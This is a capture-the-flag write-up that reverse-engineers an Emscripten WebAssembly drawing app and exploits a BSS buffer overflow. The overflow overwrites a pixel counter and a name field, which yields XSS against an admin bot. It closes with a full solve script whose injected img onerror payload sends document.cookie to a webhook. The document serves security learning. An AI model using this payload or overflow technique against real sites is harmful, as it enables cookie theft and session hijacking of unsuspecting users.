Overflow over BSS in wasm
This was the only challenge I worked on during this CTF but was able to proudly solve it within 2 hours (admin bot was broken unfortunately so couldn't submit until the next morning). All disassembly was done with diswasm, although the Ghidra WASM plugin is a lot more intuitive for others.
The challenge gives a web app with the ability to draw rgb pixels onto the canvas, with 3 layers available. All the colors of each layer are stored on the wasm, and then each frame they are applied back onto the canvas. You are also given the ability to save your canvas art, at which point the client rips R,G,B and A channels of each layer out of the wasm and sends them out to the server. The server then creates a link to it that it sends back to the client. When visitting the link from clientside, the layers are loaded back into the wasm - BUT, there is a dangerous overflow at this point in the program logic, which will be described further later on. The solve idea is for you to find a way to send the server some art data which, when submitted to and viewed by the admin bot, will allow for some sort of XSS to leak cookies.
Lines 96-107 in index.html
(uploaded below) are only shown when visitting a previously existing artwork. One would have to assume that there is some way to influence XSS-based exploitation through this code alone, since it's expected that we send something to the admin bot to get the cookie.
Any function calls starting with _ are exports from the WASM
{% if saved %}
const px = '{{ px }}';
const name = '{{ name }}';
_clearCanvas();
const bin = base64ToArr(px);
const arr = arrToCharArr(bin);
_copyCanvas(arr, bin.length);
_setName(strToCharArr(name), name.length);
{% endif %}
When assuming that some bug arises from the code above, I looked into the variables name
and px
, templated through by the python app.py
(uploaded below).
@app.route('/save', methods=['POST'])
def post_image():
img, name = request.json['img'], request.json['name']
id = uuid4()
images[id] = {
'img': img,
'name': name
}
return redirect('/img/' + str(id))
@app.route('/img/<uuid:id>')
def image_id(id):
if id not in images:
return redirect('/')
img = images[id]['img']
name = images[id]['name']
return render_template('index.html', px=img, name=name, saved=True)
The code shows that the img
and name
has no sanitization or size checks on creation or viewing of the image. At this point it was clear to me that there was some sort of overflow going on in the wasm that would have allowed for exploitation. At first I feared the worst and assumed it was some sort of twisted heap overflow. Fortunately the overflow was over the BSS.
The FIRST thing you do when coming across a wasm program is PRAY that it was coded in C/C++ and not Rust or Go.
(module
(func $env.emscripten_run_script (;0;) (import "env" "emscripten_run_script") (param i32))
Fortunately, the first lines of Chromium's devtools disassembly gave it away. Emscripten compiled C/C++. How relieving haha.
Just scrolling down through the Chromium's disassembly and seeing some very exciting stuff.
(func $copyCanvas (;240;) (export "copyCanvas") (param $var0 i32) (param $var1 i32)
(local $var2 i32)
(local $var3 i32)
(; . . . ;)
(local $var12 i32)
global.get $global0
local.set $var2
i32.const 16
local.set $var3
local.get $var2
local.get $var3
i32.sub
local.set $var4
Already starting to see some familiar functions - copyCanvas
is shown here. Also in this code alone you can tell that the wasm is (for the most part) unminified. First let me make it clear that $global0
is LLVM's RSP
in wasm. The RBP
is generally stored in another local. In LLVM-unminified functions in wasm, there is a local.set
after almost any single operation, where as in minified its inlined.
Minified LLVM would have the first instructions of a function be more like this
global.get $global0
i32.const 16
i32.sub
local.set $var4 ; or local.tee
;; aka $var4 = $global0 - 16
But in unminified
global.get $global0
local.set $var2
i32.const 16
local.set $var3
i32.sub
local.set $var4
;; aka $var2 = $global0
;; $var3 = 16
;; $var4 = $var2 - $var3
To most people, this unminified code would seem more unreadable - and generally, sure the WAT could be more unreadable, but it's way easier for a decompiler to decompile. diswasm
is very good at dealing with this unminified style of wasm, so it is the perfect tool to use for this.
Lets use diswasm
to check out some of the functions in the plausibly vulnerable code at lines 96-107 in index.html
I decompiled some of these for readability
void copyCanvas(char* pixels, int pixellen) {
/* $func938 was memcpy */
memcpy(0x21924, pixels, pixellen);
/* smth was free */
free(pixels);
}
void setName(char* nameptr, int namelen) {
// offset=0x4
int i;
if (namelen >= 8) namelen = 7;
i = 0x0;
for (int i = 0; i < namelen; ++i) {
((char*) 0x2191c)[i] = nameptr[i];
}
((char*) 0x2191c)[namelen] = 0;
free(nameptr);
return;
}
void clearCanvas() {
/* $func941 seemed like memset so I subsituted early on */
memset(0x2091c, 0x1000, 0xff);
memset(0x21924, 0x3000, 0xff);
}
Notable addresses in BSS as observed in the code above:
0x2091c
-> some sort4096
byte long array0x2191c
-> some sort of8
byte long array0x21924
-> some sort of4096 * 3
byte long array
The fact they are all next to eachother means they were in a struct or just next to consecutively coded
#define CANVAS_SIZE (32)
#define BYTES_PER_PIXEL (4) /* rgba */
#define LAYER_CNT (3)
// address@=0x2091c
uint8_t image[CANVAS_SIZE * CANVAS_SIZE * BYTES_PER_PIXEL];
// address@=0x2191c
char name[8];
// address@=0x21924
uint8_t imageLayers[CANVAS_SIZE * CANVAS_SIZE * BYTES_PER_PIXEL][LAYER_CNT];
At this point in analysis it became pretty clear what we were able to manipulate. But I still wasn't sure about where XSS came from all this. So, like a pro hacker I searched for "innerHTML =" in the JS code. One result:
const setName = () => {
const name = UTF8ToString(_getName());
document.getElementById('name-h1').innerHTML = name;
}
On line 88-92 of index.html. After seeing this it was ultra clear -> explot was to overflow image
into name
and start writing arb HTML content onto the page. One thing I was confused about -setName
was not imported, and it wasn't in any of the ASM_CONSTS
, so how could it be run? Naturally I searched for "setName" in the diwasm disassembly, and found it inside of the "loop"
export (which after looking into, seemed to be called every frame).
fimport_emscripten_run_script(0x14fac /* "setName()" */ );
I assumed this just meant the name was being converted to HTML and stored every frame. With that, had to turn and find out how to overflow image
.
You'd think we could probably just use the memcpy
from earlier (reposting previous disassembly)
void copyCanvas(char* pixels, int pixellen) {
/* $func938 was memcpy */
memcpy(imageLayers, pixels, pixellen);
/* smth was free */
free(pixels);
}
But no, because its copying the canvas content into imageLayers
, which is after image
and name
. So how in the world could we overflow image
? I started to look at any other user-code that could get called by the wasm, starting with the main
function.
int main() {
$func18(0x20);
$func476(0x20, 0x20, 0x0, 0x20914, 0x20910);
$func80(0x303, 0x0);
*((unsigned int *) 0x20918) = $func670(0x0, 0x20, 0x20, 0x20, 0x0, 0x0, 0x0, 0x0);
fimport_emscripten_set_main_loop(0x1, 0x0, 0x1);
return 0x0;
}
I didn't understand what any of the code was doing except the fimport_emscripten_set_main_loop(0x1, 0x0, 0x1)
, so I just started with that haha. This the source code for that import:
function _emscripten_set_main_loop(func, fps, simulateInfiniteLoop) {
var browserIterationFunc = getWasmTableEntry(func);
setMainLoop(browserIterationFunc, fps, simulateInfiniteLoop);
}
As you can see it takes the first argument, then uses it as a index into the function_table to get a function reference to call every tick. Since the first argument is 1
when called in main, we just need to look at the 1th element in the function_table. Luckily that is available in diswasm at the bottom (but before the memory dump).
// Function table
(*__function_table[602])() = {
NULL,
$func12, // $func245 void ()
According to the disassembly, $func12
is the function that gets exported as "loop" so it that confirms our assumption that the loop
function is getting called every frame. After a quick disassembly + handtuning, this is what the loop function is doing.
#define CANVAS_SIZE (32)
#define BYTES_PER_PIXEL (4) /* rgba */
#define LAYER_CNT (3)
// address@=0x2091c
uint8_t image[CANVAS_SIZE * CANVAS_SIZE * BYTES_PER_PIXEL];
// address@=0x2191c
char name[8];
// address@=0x21924
uint8_t imageLayers[CANVAS_SIZE * CANVAS_SIZE * BYTES_PER_PIXEL][LAYER_CNT];
// address=@0x24924;
uint16_t imagePixelCount;
// O[0] Decompilation of $func245, known as $func12
export "loop"; // $func245 is exported to "loop"
void $func12() {
// offset=0x1c
int local_1c;
// offset=0x18
int i;
// offset=0x14
int local_14;
// offset=0x10
int j;
// offset=0xc
int local_c;
/* I ignored this stuff (diswasm also has bugged if statements rn so this might not be the full code)
label$1: {
if (((*((unsigned int *) *((unsigned int *) 0x20918)) & 0x2) == 0x0)) break label$1;
$func686(*((unsigned int *) 0x20918));
};
local_1c = *((unsigned int *) *((unsigned int *) 0x20918) + 0x14);
*/
// For every pixel, copy the highest
// priority (in terms of layers) visible pixel,
// defaulting with the bottom layer, into the canvas
for (int i = 0x0; i < imagePixelCount; i += 4) {
// This code basically gets the highest
// priority layer {top mid bottom} that
// is still visible (with alpha of 0xFF)
// and stores that layer index into the
// `layer` variable
int layer = 0; /* but if none are visible, default to the bottom layer */
for (int j = 0; j < 3; ++j) {
if (0xFF - imageLayers[j][i + 0x3] == 0xFF) layer = j;
}
// copy pixel from that visible layer into the image
image[i] = imageLayers[layer][i];
image[i+1] = imageLayers[layer][i + 1];
image[i+2] = imageLayers[layer << 0xc][i + 2];
image[i+3] = 0xFF - imageLayers[layer << 0xc][i + 3];
}
// Put name into the html
fimport_emscripten_run_script(0x14fac /* "setName()" */ );
// idk
memcpy(local_1c, 0x2091c, 0x1000);
/* I feel for some reason that this has to do with SDL mutexes or something, also ignored it
label$7: {
if (((*((unsigned int *) *((unsigned int *) 0x20918)) & 0x2) == 0x0)) break label$7;
$func687(*((unsigned int *) 0x20918));
};
local_c = $func489(*((unsigned int *) 0x20910), *((unsigned int *) 0x20918));
$func496(*((unsigned int *) 0x20910));
$func499(*((unsigned int *) 0x20910), local_c, 0x0, 0x0);
$func502(*((unsigned int *) 0x20910));
$func488(local_c);
*/
return;
}
Seeing this, you can tell that imagePixelCount
is above imageLayers
in memory and therefore is something we can overflow. So all we need to do is just overflow imagePixelCount
using an overflowed imageLayer
, into a number that allows us to write bytes into name
.
Instead of walking through every part of the exploit one by one here, I'll just give a brief synposis and a commented version of the solvescript.
Basically all that was required was a buffer of size CANVAS_SIZE * CANVAS_SIZE * BYTES_PER_PIXEL * LAYER_CNT
to overflow imageLayers
. After overflow, I wrote a size similar to the previous imagePixelCount
size of CANVAS_SIZE * CANVAS_SIZE
, but added a couple more for space for the payload. Then I had to adjust the buffer that was doing the overflowing, because that buffer contains the content that will be written. So after CANVAS_SIZE * CANVAS_SIZE
pixels of data in the first layer, I just added some bytes that would be read both as layer 2 at first, then layer 0 later. Layer 0 is the default so as long as the rest of the bytes I made were not visible, it would "render" aka copy them over and override name. Because of that, I just injected my payload into those bytes, and got flag.
// This is where the cookies will be sent
const WEBHOOK = "usually i generate one from webhook.site";
// XSS is the HTML
const XSS = "<img src=# onerror='fetch(`" + WEBHOOK + "?`+document.cookie)'>";
// This function creates a byte array of N pixels, all with rgba(R, G, B, A)
const createNPixels = (N, R, G, B, A) => Array(N).fill([R, G, B, A]).flat();
// Just using this as a constant for the "invisible" alpha pixel. If this is a pixel's alpha
// Then the pixel is not visible (as considered by the renderer/copier)
const invis = 0xFF - 0x00;
const BYTES_PER_PIXEL = 4;
const PIXELS_PER_LAYER = 32 * 32;
// Rounds up, the amount of pixels required for the payload
const PIXELS_OVERFLOWN = Math.ceil((XSS.length + 1) / 4);
// The overflow is what the new name will be set to
// defaulting it to null bytes; for null terminated C strings
const OVERFLOW = new Uint8Array(createNPixels(PIXELS_OVERFLOWN, 0x00, 0x00, 0x00, 0xFF - 0x00));
// Put the XSS at the top of the overflow
OVERFLOW.set(XSS.split``.map(e => e.charCodeAt()), 0);
// Invert every alpha byte
for (let i = 0; i < OVERFLOW.length; i += 4) {
OVERFLOW[i + 3] = 0xFF - OVERFLOW[i + 3];
}
// This will be sent to the server
const PAYLOAD = new Uint8Array([
// Fill in the first layer with emptiness
createNPixels(PIXELS_PER_LAYER, 0x00, 0x00, 0x00, invis),
// Then fill `PIXELS_OVERFLOWN` more bytes, using the OVERFLOW (XSS pixel code)
// This is what overflows `name`
[...OVERFLOW],
// Fill in the rest of the 2 layers
createNPixels(PIXELS_PER_LAYER * 2 - PIXELS_OVERFLOWN, 0x00, 0x00, 0x00, invis),
// Then overflow the `imagePixelCount` variable in BSS to allow for all this hijacking
(PIXELS_OVERFLOWN >> 0) & 0xFF, (PIXELS_OVERFLOWN >> 0) & 0xFF, 0x00, invis,
// Then create layer 3's overflow pixels (because the size was adjusted)
createNPixels(PIXELS_OVERFLOWN - 1, 0x00, 0x00, 0x00, invis)
].flat());
// Send it to the server and get your url to send to admin
fetch('/save', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
name: "",
img: btoa(String.fromCharCode(...PAYLOAD))
})
}).then((res) => {
console.log(res.url)
});
- It's worth noting that all ALPHA bytes are inverted in canvas image data, causing all the weird alpha stuff in the solve script.
- Solve script, decompilation, and relevant server files are uploaded below
Sign up for bcactf.com - we have some intense wasm-based challenges planned.